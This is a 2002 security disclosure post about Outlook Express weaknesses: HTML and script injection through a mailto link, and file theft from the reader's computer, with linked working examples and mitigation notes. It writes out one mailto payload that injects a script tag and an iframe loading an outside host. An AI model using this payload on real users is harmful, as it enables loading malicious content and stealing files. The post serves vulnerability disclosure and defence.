Sunday, April 14, 2002 1. Not Possible Technically it cannot be possible to create an html mail message from a mailto url scheme without user input. However shoe-horning html in through insertion of script tags does make it possible. Default installation of Outlook Express and probably Outlook, is 'mail sending format: html': <a href="mailto: freak@bloatedcorp.com ?cc=contest@bloatedcorp.com &subject=Million Dollar Contest &body=<script></script> <iframe src=http://www.malware.com'>"> contest@bloatedcorp.com </a> This is not a good idea. Working Example: http://www.malware.com/$illine$$.html Note: this is an 8th month old 'thing':http://www.securityfocus.com/bid/3334 2. EVEN WORSE: Trivial file theft using Outlook Express, maybe Outlook. Instead of delivering files to the target computer, we rather take files from the target computer. With a bit of Idiot Engineering, we reverse the process as detailed here: http://www.securityfocus.com/bid/1221 and here: http://www.kb.cert.org/vuls/id/31994. Note: now almost 24 months old. Working Example: This will pluck and send your Autoexec.bat from a default Windows installation. Targeted computers with specific files can prove more lucrative. http://www.malware.com/idiot$.html Notes: 1. Outlook Express 6 default mail is in the 'restricted zone'. Outlook Express 5.5 isn't. Disable Active X and all those other things. 2. Do not send 'unknown' webmasters entire web pages despite how tempting the request is. 3. Scraping the bottom of the barrel. End Call. -- http://www.malware.com
